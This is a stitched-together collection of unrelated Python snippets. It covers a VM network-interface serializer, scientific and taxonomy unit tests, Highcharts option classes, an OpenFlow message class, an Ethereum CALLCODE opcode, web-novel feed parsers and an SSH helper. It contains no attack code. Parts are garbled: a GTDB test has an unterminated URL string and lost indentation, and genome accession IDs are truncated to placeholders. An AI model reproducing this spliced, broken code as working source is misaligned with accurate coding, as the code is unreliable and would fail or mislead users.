            logger.info(' ^ Removal of association of IP %s with vm %s will be delayed until PUT vm_manage is done.', ip, vm)
        elif many:
            ip.vms.remove(vm)
        else:
            ip.vm = None
            ip.save()

    # NOTE(review): takes no `self` — presumably decorated with @staticmethod upstream.
    def _create_vm_ip_association(vm, ip, many=False):
        logger.info('Creating association of IP %s with vm %s.', ip, vm)
        if ip.vm:
            raise APIError(detail='Unexpected problem with IP address association.')
        if many:
            ip.vms.add(vm)
        else:
            ip.vm = vm
            ip.save()

    # NOTE(review): first parameter is `cls` — presumably decorated with @classmethod upstream.
    def _update_vm_ip_association(cls, vm, ip, delete=False, many=False):
        if delete:
            cls._remove_vm_ip_association(vm, ip, many=many)
        else:
            cls._create_vm_ip_association(vm, ip, many=many)

    def save_ip(self, task_id, delete=False, update=False):
        """Persist IP association and DNS A/PTR side effects for this NIC."""
        vm = self.vm
        ip = self._ip
        ip_old = self._ip_old
        if (ip is False):
            # DHCP passthrough: no concrete IP object to associate.
            assert self._net.dhcp_passthrough
        else:
            assert ip
        if ((not update) or ip_old):
            if ip_old:
                self._remove_vm_ip_association(vm, ip_old)
            if ip:
                self._update_vm_ip_association(vm, ip, delete=delete)
            if (ip_old and ip_old.subnet.ptr_domain):
                self.save_ptr(self.request, task_id, vm, ip_old, ip_old.subnet, delete=True)
            if (ip and self._net and self._net.ptr_domain):
                self.save_ptr(self.request, task_id, vm, ip, self._net, delete=delete)
        if self._changing_allowed_ips:
            for _ip_old in self._ips_old:
                self._remove_vm_ip_association(vm, _ip_old, many=True)
            for _ip in self._ips:
                self._update_vm_ip_association(vm, _ip, delete=delete, many=True)
        dns = self.object['dns']
        remove_dns = (self._dns and (not dns))
        if (dns or remove_dns):
            if remove_dns:
                delete = True
            if (delete and ip_old):
                # Remove the A record that pointed at the old IP.
                ip = ip_old
            if ip:
                self.save_a(self.request, task_id, vm, ip, dns=self._dns, delete=delete)
        return ip

    def update_ip(self, task_id):
        return self.save_ip(task_id, update=True)

    def delete_ip(self, task_id):
        return self.save_ip(task_id, delete=True)

    # NOTE(review): overrides the serializer `data` property — presumably
    # decorated with @property upstream.
    def data(self):
        if (self._data is None):
            data = super(VmDefineNicSerializer, self).data
            # nic_id is exposed 1-based to API consumers.
            if self.many:
                for (i, nic) in enumerate(data):
                    nic['nic_id'] = (i + 1)
            else:
                data['nic_id'] = self.nic_id
                try:
                    data['nic_id'] += 1
                except TypeError:
                    pass
            self._data = data
        return self._data

    def get_monitoring_ip(self, delete=False):
        """Return the monitoring IP to store ('' to clear it, None to leave unchanged)."""
        monitoring = self.object['monitoring']
        ip = self.object['ip']
        if (self._ip is False):
            assert self._net.dhcp_passthrough
            assert (not monitoring)
        else:
            assert self._ip
        if (self._monitoring_old and (delete or (not monitoring))):
            logger.info('Removing monitoring IP %s for vm %s.', ip, self.vm)
            return ''
        elif monitoring:
            logger.info('Saving monitoring IP %s for vm %s.', ip, self.vm)
            return ip
        else:
            return None
def test_medium_dispersion_create():
    """Construct one instance of each dispersive-medium model and check that
    every one can be embedded in a Structure."""
    pole_residue = td.PoleResidue(eps_inf=1.0, poles=[((-1 + 2j), (1 + 3j)), ((-2 + 4j), (1 + 5j))])
    sellmeier = td.Sellmeier(coeffs=[(2, 3), (2, 4)])
    lorentz = td.Lorentz(eps_inf=1.0, coeffs=[(1, 3, 2), (2, 4, 1)])
    lorentz_alt = td.Lorentz(eps_inf=1.0, coeffs=[(1, 2, 3), (2, 1, 4)])
    drude = td.Drude(eps_inf=1.0, coeffs=[(1, 3), (2, 4)])
    debye = td.Debye(eps_inf=1.0, coeffs=[(1, 3), (2, 4)])
    # Iteration order matches the original test: PR, SM, DB, LZ, DR, LZ2.
    for dispersive_medium in (pole_residue, sellmeier, debye, lorentz, drude, lorentz_alt):
        _ = td.Structure(geometry=td.Box(size=(1, 1, 1)), medium=dispersive_medium)
def wrong_answer_count(start_date):
    """Return the number of review-log entries answered wrong (ease == 1)
    since *start_date* (compared against revlog ids in seconds)."""
    keep_log = ah.user_settings['keep_log']
    if keep_log:
        ah.log.debug('Begin function')
    # revlog ids are epoch milliseconds; id/1000 converts to seconds.
    wrong_count = mw.col.db.scalar('\n select\n count()\n from revlog where\n ease = 1 and\n id/1000 > ?\n ', start_date)
    if keep_log:
        ah.log.debug(('End function returning: %s' % wrong_count))
    return wrong_count
def test_phi_function_in_head2():
    """Liveness analysis of a single self-looping block whose head holds two
    phi-functions followed by an addition that redefines u#2."""
    u1 = Variable('u', Integer.int32_t(), 1)
    u2 = Variable('u', Integer.int32_t(), 2)
    v0 = Variable('v', Integer.int32_t(), 0)
    v1 = Variable('v', Integer.int32_t(), 1)
    head = BasicBlock(0, [Phi(u1, [v0, u2]), Phi(v1, [v0, u1]), Assignment(u2, BinaryOperation(OperationType.plus, [u1, v1]))])
    # Phi origins: v0 flows in from function entry (None), u2/u1 around the loop.
    head.instructions[0]._origin_block = {None: v0, head: u2}
    head.instructions[1]._origin_block = {None: v0, head: u1}
    graph = ControlFlowGraph()
    graph.add_node(head)
    graph.add_edges_from([UnconditionalEdge(head, head)])
    analysis = LivenessAnalysis(graph)
    assert (analysis._uses_phi_block[None] == {v0})
    assert ((analysis.live_in_of(head) == {v1, u1}) and (analysis.live_out_of(head) == {u1, u2}))
class Test_gtdbquery(unittest.TestCase):
def test_00_update_database(self):
gtdb = GTDBTaxa()
url = '
print(f'Downloading GTDB database release 202 to {DEFAULT_GTDBTAXADUMP} from {url}')
with open(DEFAULT_GTDBTAXADUMP, 'wb') as f:
f.write(requests.get(url).content)
gtdb.update_taxonomy_database(DEFAULT_GTDBTAXADUMP)
if (not os.path.exists(DATABASE_PATH)):
gtdbquery.update_db(DATABASE_PATH)
    def test_01tree_annotation(self):
        """Annotate a tree whose leaf names are GTDB taxa names (taxid_attr='name')."""
        tree = PhyloTree('((c__Alicyclobacillia, c__Bacilli), s__Caballeronia udeis);', sp_naming_function=(lambda name: name))
        tree.annotate_gtdb_taxa(dbfile=DATABASE_PATH, taxid_attr='name')
        # Root gets the common ancestor of all leaves.
        self.assertEqual(tree.props.get('sci_name'), 'd__Bacteria')
        # Internal node: parent of the two Bacillota classes.
        firmicutes = tree['c__Bacilli'].up
        self.assertEqual(firmicutes.props.get('taxid'), 'p__Firmicutes')
        self.assertEqual(firmicutes.props.get('sci_name'), 'p__Firmicutes')
        self.assertEqual(firmicutes.props.get('rank'), 'phylum')
        self.assertEqual(firmicutes.props.get('named_lineage'), ['root', 'd__Bacteria', 'p__Firmicutes'])
        # Leaf annotated at species rank with its full lineage.
        caballeronia = tree['s__Caballeronia udeis']
        self.assertEqual(caballeronia.props.get('taxid'), 's__Caballeronia udeis')
        self.assertEqual(caballeronia.props.get('sci_name'), 's__Caballeronia udeis')
        self.assertEqual(caballeronia.props.get('rank'), 'species')
        self.assertEqual(caballeronia.props.get('named_lineage'), ['root', 'd__Bacteria', 'p__Proteobacteria', 'c__Gammaproteobacteria', 'o__Burkholderiales', 'f__Burkholderiaceae', 'g__Caballeronia', 's__Caballeronia udeis'])
    def test_02tree_annotation(self):
        """Annotate a tree of genome accessions via the species attribute (taxid_attr='species')."""
        tree = PhyloTree('((GB_GCA_.1,RS_GCF_.1),(GB_GCA_.1),(GB_GCA_.1));', sp_naming_function=(lambda name: name))
        tree.annotate_gtdb_taxa(dbfile=DATABASE_PATH, taxid_attr='species')
        self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
        # Internal node: parent of the first accession pair.
        cryptofilum = tree['GB_GCA_.1'].up
        self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('rank'), 'species')
        self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
        # Genome accessions themselves are annotated as subspecies.
        sp = tree['GB_GCA_.1']
        self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
        self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
        self.assertEqual(sp.props.get('rank'), 'subspecies')
        self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
    def test_03tree_annotation(self):
        """Annotate leaves named 'accession|protein', deriving the species from the prefix."""
        tree = PhyloTree('((GB_GCA_.1|protA,RS_GCF_.1|protB),(GB_GCA_.1|protC),(GB_GCA_.1|protD));', sp_naming_function=(lambda name: name.split('|')[0]))
        tree.annotate_gtdb_taxa(taxid_attr='species')
        self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
        # Internal node: parent of protA/protB.
        cryptofilum = tree['GB_GCA_.1|protA'].up
        self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('rank'), 'species')
        self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
        # Leaf annotation uses the accession part only.
        sp = tree['GB_GCA_.1|protC']
        self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
        self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
        self.assertEqual(sp.props.get('rank'), 'subspecies')
        self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
    def test_04tree_annotation(self):
        """Annotate via a custom node property holding the accession (taxid_attr='gtdb_spcode')."""
        tree = PhyloTree('((protA:1, protB:1):1,(protC:1),(protD:1):1):1;')
        annotate_dict = {'protA': 'GB_GCA_.1', 'protB': 'RS_GCF_.1', 'protC': 'GB_GCA_.1', 'protD': 'GB_GCA_.1'}
        # Attach the accession to each leaf as a property before annotating.
        for (key, value) in annotate_dict.items():
            tree[key].add_prop('gtdb_spcode', value)
        tree.annotate_gtdb_taxa(taxid_attr='gtdb_spcode')
        self.assertEqual(tree.props.get('sci_name'), 'g__Korarchaeum')
        # Internal node: parent of protA/protB.
        cryptofilum = tree['protA'].up
        self.assertEqual(cryptofilum.props.get('taxid'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('sci_name'), 's__Korarchaeum cryptofilum')
        self.assertEqual(cryptofilum.props.get('rank'), 'species')
        self.assertEqual(cryptofilum.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum cryptofilum'])
        sp = tree['protC']
        self.assertEqual(sp.props.get('taxid'), 'GB_GCA_.1')
        self.assertEqual(sp.props.get('sci_name'), 's__Korarchaeum sp')
        self.assertEqual(sp.props.get('rank'), 'subspecies')
        self.assertEqual(sp.props.get('named_lineage'), ['root', 'd__Archaea', 'p__Thermoproteota', 'c__Korarchaeia', 'o__Korarchaeales', 'f__Korarchaeaceae', 'g__Korarchaeum', 's__Korarchaeum sp', 'GB_GCA_.1'])
    def test_gtdbquery(self):
        """Query descendant taxa of a class with/without intermediate nodes and a rank limit."""
        gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
        # With intermediate_nodes=True all internal ranks appear in the result.
        out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=True)
        self.assertEqual(set(out), set(['o__Thorarchaeales', 'f__Thorarchaeaceae', 'g__B65-G9', 's__B65-G9 sp', 'GB_GCA_.1', 'GB_GCA_.1', 'g__OWC5', 's__OWC5 sp', 'GB_GCA_.1', 's__OWC5 sp', 'GB_GCA_.1', 'g__SMTZ1-45', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 's__SMTZ1-45 sp', 'GB_GCA_.1', 'g__SMTZ1-83', 's__SMTZ1-83 sp', 'GB_GCA_.1', 's__SMTZ1-83 sp', 'GB_GCA_.1', 's__SMTZ1-83 sp', 'GB_GCA_.1', 'g__MP8T-1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 's__MP8T-1 sp', 'GB_GCA_.1', 'g__TEKIR-14', 's__TEKIR-14 sp', 'GB_GCA_.1', 'g__JACAEL01', 's__JACAEL01 sp', 'GB_GCA_.1', 'g__SHMX01', 's__SHMX01 sp', 'GB_GCA_.1', 'g__TEKIR-12S', 's__TEKIR-12S sp', 'GB_GCA_.1', 'g__WTCK01', 's__WTCK01 sp', 'GB_GCA_.1']))
        # Without intermediate nodes only the terminal accessions remain
        # (duplicates collapse in the set comparison).
        out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=False)
        self.assertEqual(set(out), set(['GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1', 'GB_GCA_.1']))
        # rank_limit='species' truncates the traversal at species level.
        out = gtdb.get_descendant_taxa('c__Thorarchaeia', intermediate_nodes=False, rank_limit='species')
        self.assertEqual(set(out), set(['s__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__MP8T-1 sp', 's__SMTZ1-83 sp', 's__SMTZ1-83 sp', 's__SMTZ1-83 sp', 's__TEKIR-14 sp', 's__SHMX01 sp', 's__OWC5 sp', 's__OWC5 sp', 's__JACAEL01 sp', 's__B65-G9 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__SMTZ1-45 sp', 's__WTCK01 sp', 's__TEKIR-12S sp']))
def test_get_topology(self):
gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
tree = gtdb.get_topology(['p__Huberarchaeota', 'o__Peptococcales', 'f__Korarchaeaceae', 's__Korarchaeum'], intermediate_nodes=True, collapse_subspecies=True, annotate=True)
self.assertEqual(sorted(tree.leaf_names()), ['f__Korarchaeaceae', 'o__Peptococcales', 'p__Huberarchaeota'])
def test_name_lineages(self):
gtdb = GTDBTaxa(dbfile=DATABASE_PATH)
out = gtdb.get_name_lineage(['RS_GCF_.1'])
self.assertEqual(out[0]['RS_GCF_.1'], ['root', 'd__Bacteria', 'p__Firmicutes_B', 'c__Moorellia', 'o__Moorellales', 'f__Moorellaceae', 'g__Moorella', 's__Moorella thermoacetica', 'RS_GCF_.1'])
out = gtdb.get_name_lineage(['o__Peptococcales'])
self.assertEqual(out[0]['o__Peptococcales'], ['root', 'd__Bacteria', 'p__Firmicutes_B', 'c__Peptococcia', 'o__Peptococcales']) |
class RegexField(CharField):
    """A CharField that additionally validates its input against a regular expression."""
    default_error_messages = {'invalid': _('This value does not match the required pattern.')}

    def __init__(self, regex, **kwargs):
        super().__init__(**kwargs)
        # Reuse the field-level "invalid" message so callers can override it
        # through the usual error_messages mechanism.
        self.validators.append(RegexValidator(regex, message=self.error_messages['invalid']))
def test_boolean_roundtrip():
    """Both boolean values must survive an encode/decode round trip."""
    schema = {'type': 'record', 'name': 'test_boolean_roundtrip', 'fields': [{'name': 'field', 'type': 'boolean'}]}
    for value in (True, False):
        record = {'field': value}
        assert record == roundtrip(schema, record)
class OptionSeriesPackedbubbleTooltipDatetimelabelformats(Options):
    """Datetime label formats for packed-bubble series tooltips.

    Each time unit is a read/write option backed by the shared Options
    config store; reading an unset option yields the Highcharts default
    shown in the corresponding getter.

    NOTE(review): every getter in this class was shadowed by its same-named
    setter (no decorators), making the getters unreachable. The
    @property / @<name>.setter pairs have been restored — confirm against
    the original generated source.
    """

    @property
    def day(self):
        return self._config_get('%A, %e %b %Y')

    @day.setter
    def day(self, text: str):
        self._config(text, js_type=False)

    @property
    def hour(self):
        return self._config_get('%A, %e %b, %H:%M')

    @hour.setter
    def hour(self, text: str):
        self._config(text, js_type=False)

    @property
    def millisecond(self):
        return self._config_get('%A, %e %b, %H:%M:%S.%L')

    @millisecond.setter
    def millisecond(self, text: str):
        self._config(text, js_type=False)

    @property
    def minute(self):
        return self._config_get('%A, %e %b, %H:%M')

    @minute.setter
    def minute(self, text: str):
        self._config(text, js_type=False)

    @property
    def month(self):
        return self._config_get('%B %Y')

    @month.setter
    def month(self, text: str):
        self._config(text, js_type=False)

    @property
    def second(self):
        return self._config_get('%A, %e %b, %H:%M:%S')

    @second.setter
    def second(self, text: str):
        self._config(text, js_type=False)

    @property
    def week(self):
        return self._config_get('Week from %A, %e %b %Y')

    @week.setter
    def week(self, text: str):
        self._config(text, js_type=False)

    @property
    def year(self):
        return self._config_get('%Y')

    @year.setter
    def year(self, text: str):
        self._config(text, js_type=False)
class bsn_gentable_bucket_stats_reply(bsn_stats_reply):
    """OpenFlow 1.3 BSN experimenter multipart reply carrying gentable bucket stats.

    Generated-style wire message class: the class attributes below identify
    the message on the wire, and `entries` holds the per-bucket stat records.
    """
    version = 4  # OpenFlow protocol version (OF 1.3)
    type = 19  # OFPT_MULTIPART_REPLY
    stats_type = 65535  # OFPMP_EXPERIMENTER
    experimenter = 6035143  # Big Switch Networks experimenter ID
    subtype = 5  # BSN gentable bucket stats message subtype
    def __init__(self, xid=None, flags=None, entries=None):
        # Defaults: xid stays None (assigned later), flags 0, entries empty.
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (entries != None):
            self.entries = entries
        else:
            self.entries = []
        return
    def pack(self):
        """Serialize the message; the length field is patched in afterwards."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        # Placeholder for the 16-bit length, overwritten below once known.
        packed.append(struct.pack('!H', 0))
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        # 4 bytes of padding. NOTE(review): this is a str, not bytes —
        # Python 2 era code; under Python 3 ''.join would mix str/bytes.
        packed.append(('\x00' * 4))
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)
    def unpack(reader):
        """Parse a message from `reader`; asserts the fixed header fields.

        NOTE(review): called without an instance (no self) — presumably a
        @staticmethod in the original generated source; confirm.
        """
        obj = bsn_gentable_bucket_stats_reply()
        _version = reader.read('!B')[0]
        assert (_version == 4)
        _type = reader.read('!B')[0]
        assert (_type == 19)
        _length = reader.read('!H')[0]
        # Restrict further reads to this message's declared length
        # (4 bytes of the header were already consumed).
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 65535)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)  # padding
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 6035143)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 5)
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.bsn_gentable_bucket_stats_entry.unpack)
        return obj
    def __eq__(self, other):
        # Equality over payload fields only (version/type/etc. are class constants).
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.entries != other.entries):
            return False
        return True
    def pretty_print(self, q):
        """Write a human-readable dump of the message to pretty-printer `q`."""
        q.text('bsn_gentable_bucket_stats_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REPLY_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('entries = ')
                q.pp(self.entries)
            q.breakable()
        q.text('}')
def callcode(evm: Evm) -> None:
    """CALLCODE opcode: execute the code at `code_address` in the context of
    the current account.

    Pops gas, code address, value and the input/output memory ranges from the
    stack; the message target is the *current* account, so storage writes and
    the value transfer stay within the caller's own context.
    """
    # Stack layout (top first): gas, code_address, value, in_offset, in_size,
    # out_offset, out_size.
    gas = Uint(pop(evm.stack))
    code_address = to_address(pop(evm.stack))
    value = pop(evm.stack)
    memory_input_start_position = pop(evm.stack)
    memory_input_size = pop(evm.stack)
    memory_output_start_position = pop(evm.stack)
    memory_output_size = pop(evm.stack)
    # CALLCODE runs foreign code against our own account.
    to = evm.message.current_target
    extend_memory = calculate_gas_extend_memory(evm.memory, [(memory_input_start_position, memory_input_size), (memory_output_start_position, memory_output_size)])
    # Non-zero value transfers cost an extra GAS_CALL_VALUE on top of GAS_CALL.
    transfer_gas_cost = (Uint(0) if (value == 0) else GAS_CALL_VALUE)
    message_call_gas = calculate_message_call_gas(value, gas, Uint(evm.gas_left), extend_memory.cost, (GAS_CALL + transfer_gas_cost))
    charge_gas(evm, (message_call_gas.cost + extend_memory.cost))
    evm.memory += (b'\x00' * extend_memory.expand_by)
    sender_balance = get_account(evm.env.state, evm.message.current_target).balance
    if (sender_balance < value):
        # Insufficient balance: push failure and refund the call stipend.
        push(evm.stack, U256(0))
        evm.gas_left += message_call_gas.stipend
    else:
        # NOTE(review): the positional True presumably enables value
        # transfer within generic_call — confirm against its signature.
        generic_call(evm, message_call_gas.stipend, value, evm.message.current_target, to, code_address, True, memory_input_start_position, memory_input_size, memory_output_start_position, memory_output_size)
    evm.pc += 1
class OptionPlotoptionsVennSonificationDefaultinstrumentoptionsMappingPlaydelay(Options):
    """Play-delay mapping options for venn-series sonification instruments.

    NOTE(review): every getter in this class was shadowed by its same-named
    setter (no decorators), making the getters unreachable. The
    @property / @<name>.setter pairs have been restored — confirm against
    the original generated source.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesBubbleDataMarkerStatesSelect(Options):
    """Marker styling for the 'select' state of bubble-series data points.

    NOTE(review): every getter in this class was shadowed by its same-named
    setter (no decorators), making the getters unreachable. The
    @property / @<name>.setter pairs have been restored — confirm against
    the original generated source.
    """

    @property
    def enabled(self):
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def fillColor(self):
        return self._config_get('#cccccc')

    @fillColor.setter
    def fillColor(self, text: str):
        self._config(text, js_type=False)

    @property
    def lineColor(self):
        return self._config_get('#000000')

    @lineColor.setter
    def lineColor(self, text: str):
        self._config(text, js_type=False)

    @property
    def lineWidth(self):
        return self._config_get(2)

    @lineWidth.setter
    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    @property
    def radius(self):
        return self._config_get(None)

    @radius.setter
    def radius(self, num: float):
        self._config(num, js_type=False)
def extractOtterspaceTranslation(item):
    """Map an Otterspace release-feed item to a series release message.

    Returns None for previews or items without a chapter/volume, a release
    message for recognized titles/tags, and False when nothing matches.

    The original body repeated the whole title/tag chain three times; any
    item matching one of the duplicated checks would already have returned
    from the first chain, so the duplicates were unreachable and have been
    removed.
    """
    (chp, vol, frag) = extractChapterVolFragment(item['title'])
    if ((not (chp or vol)) or ('preview' in item['title'].lower())):
        return None
    # Title-based matches are checked before tag-based ones, preserving the
    # order of the original first chain.
    if ('Elqueeness' in item['title']):
        return buildReleaseMessageWithType(item, 'Spirit King Elqueeness', vol, chp, frag=frag)
    if (('[Dark Mage]' in item['title']) or ('[DarkMage]' in item['title'])):
        return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
    if ('Dragon Maken War' in item['title']):
        return buildReleaseMessageWithType(item, 'Dragon Maken War', vol, chp, frag=frag)
    if ('Legend of Legend' in item['title']):
        return buildReleaseMessageWithType(item, 'Legend of Legend', vol, chp, frag=frag)
    if (("Seoul Station's Necromancer" in item['title']) or ("Seoul Station's Necromancer" in item['tags'])):
        return buildReleaseMessageWithType(item, "Seoul Station's Necromancer", vol, chp, frag=frag)
    if ('Dark Mage' in item['tags']):
        return buildReleaseMessageWithType(item, 'Dark Mage', vol, chp, frag=frag)
    if ('Limitless Dream' in item['tags']):
        return buildReleaseMessageWithType(item, 'Limitless Dream', vol, chp, frag=frag)
    if ('Link the Orc' in item['tags']):
        return buildReleaseMessageWithType(item, 'Link the Orc', vol, chp, frag=frag)
    if ('KON' in item['tags']):
        return buildReleaseMessageWithType(item, 'King of the Night', vol, chp, frag=frag)
    if ('EoSP' in item['tags']):
        return buildReleaseMessageWithType(item, 'Emperor of Solo Play', vol, chp, frag=frag)
    return False
def test_hit_rate_value_judged_only():
    """HitRateKMetric with no_feedback_users=True across three users / top-3 ranks."""
    current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1, 2, 3, 1, 2, 3, 1, 2, 3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
    metric = HitRateKMetric(k=3, no_feedback_users=True)
    report = Report(metrics=[metric])
    mapping = ColumnMapping(recommendations_type=RecomType.RANK)
    report.run(reference_data=None, current_data=current, column_mapping=mapping)
    results = metric.get_result()
    assert len(results.current) == 3
    # Hit rate per cutoff k: user 'a' hits at rank 1, user 'c' only at rank 3.
    expected = {1: 0.3333333, 2: 0.3333333, 3: 0.6666666}
    for k, value in expected.items():
        assert np.isclose(results.current[k], value)
def extractEclipsecourtBlogspotCom(item):
    """Parser for eclipsecourt.blogspot.com release-feed items."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag to look for, canonical series name, translation type)
    tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def _run_ssh(ssh, cmd, pty=False):
(stdin, stdout, stderr) = ssh.exec_command(cmd, get_pty=pty)
stdout_str = stdout.read().decode()
stderr_str = stderr.read().decode()
if (stdout.channel.recv_exit_status() != 0):
raise Exception(stderr_str)
if ssh.raise_stderr:
if stderr_str:
raise Exception(stderr_str)
return stdout_str
return (stdout_str, stderr_str) |
def f_third_build(f_second_build):
    """Extend the second-build fixture with one extra pre-built package.

    Registers the '-example' build on the context and copies a canned fc30
    RPM into a fresh build directory inside every chroot, then yields the
    context.
    """
    context = f_second_build
    build_name = '-example'
    rpm_path = os.path.join(os.environ['TEST_DATA_DIRECTORY'], 'build_results', 'fedora-30-x86_64', build_name, 'example-1.0.14-1.fc30.x86_64.rpm')
    context.builds.append(build_name)
    for chroot in context.chroots:
        build_dir = os.path.join(context.empty_dir, chroot, build_name)
        os.mkdir(build_dir)
        shutil.copy(rpm_path, build_dir)
    yield context
def draw_tree(tree, conf, outfile):
    """Render an annotated phylogenomic tree to *outfile* (plus .svg/.pdf).

    Builds a set of custom ETE layout functions (node styling, leaf/species
    labels, branch supports, clade labels, block alignment) and renders the
    tree three times in different formats.  *conf* is not used in the
    visible body.
    """
    try:
        from ... import add_face_to_node, AttrFace, TextFace, TreeStyle, RectFace, CircleFace, random_color, SeqMotifFace
    except ImportError as e:
        # Drawing is optional: bail out quietly when the graphics stack is missing.
        print(e)
        return
    def ly_basic(node):
        # Base styling; highlights nt-based subtrees and NPR nodes when present.
        if node.is_leaf:
            node.img_style['size'] = 0
        else:
            node.img_style['size'] = 0
            node.img_style['shape'] = 'square'
            if ((len(MIXED_RES) > 1) and hasattr(node, 'tree_seqtype')):
                if (node.tree_seqtype == 'nt'):
                    # Green background marks nucleotide-based subtrees.
                    node.img_style['bgcolor'] = '#CFE6CA'
                    ntF = TextFace('nt', fsize=6, fgcolor='#444', ftype='Helvetica')
                    add_face_to_node(ntF, node, 10, position='branch-bottom')
            if ((len(NPR_TREES) > 1) and hasattr(node, 'tree_type')):
                node.img_style['size'] = 4
                node.img_style['fgcolor'] = 'steelblue'
        node.img_style['hz_line_width'] = 1
        node.img_style['vt_line_width'] = 1
    def ly_leaf_names(node):
        # Species name (italic) plus the gene name in parentheses when known.
        if node.is_leaf:
